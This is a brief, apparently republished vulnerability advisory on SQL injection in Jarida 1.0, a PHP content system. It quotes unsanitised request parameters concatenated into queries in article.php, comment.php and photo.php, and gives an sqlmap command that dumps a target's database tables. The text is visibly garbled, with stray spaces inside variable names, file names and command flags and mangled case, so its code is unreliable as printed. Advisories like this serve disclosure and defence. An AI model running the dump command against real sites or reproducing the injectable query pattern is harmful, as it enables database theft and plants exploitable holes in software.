Title: Jarida 1.0 SQL Injection
Author: Ptrace Security (Gianni Gnesa [gnix]) www.2cto.com
: Http://sourceforge.net/projects/jarida/
Affected Versions: 1.0
Test Platform: CentOS 5.6
[01]./article. php: 28: $ query = "SELECT article_id FROM tblArticle WHERE article_id =". $ _ GET ['id'];
=>./Sqlmap. py-u http://www.bkjia.com/jarida_1.0/article. php? Id = 1 -- dump -- tables
[02]./comment. php
36 $ name = $ _ POST ['name'];
37 $ web =$ _ POST ['web'];
38 $ title = $ _ POST ['title'];
39 $ body =$ _ POST ['body'];
40 $ ip = $ _ SERVER ['remote _ ADDR '];
41 $ article_id = $ _ POST ['id'];
42 $ date = time ();
43
...
56
57 switch ($ _ POST ['type'])
58 {
59 case 'Article ':
60 $ redirect_url = "./article. php? Id = ". $ _ POST ['id'];
61 $ query = "insert into tblArticleComment (comment_article_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip)
62 VALUES ('$ article_id', '$ title',' $ date', '$ body',' $ name', '$ web',' $ ip ')";
63 break;
64
65 case 'photo ':
66 $ redirect_url = "./photo. php? Id = ". $ _ POST ['id'];
67 $ query = "insert into tblPhotoComment (comment_photo_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip)
68 VALUES ('$ article_id', '$ title',' $ date', '$ body',' $ name', '$ web',' $ ip ')";
69 break;
70}
[03]./photo. php
39 $ query = "SELECT photo_id FROM tblPhoto
40 WHERE photo_id = ". $ _ GET ['id'];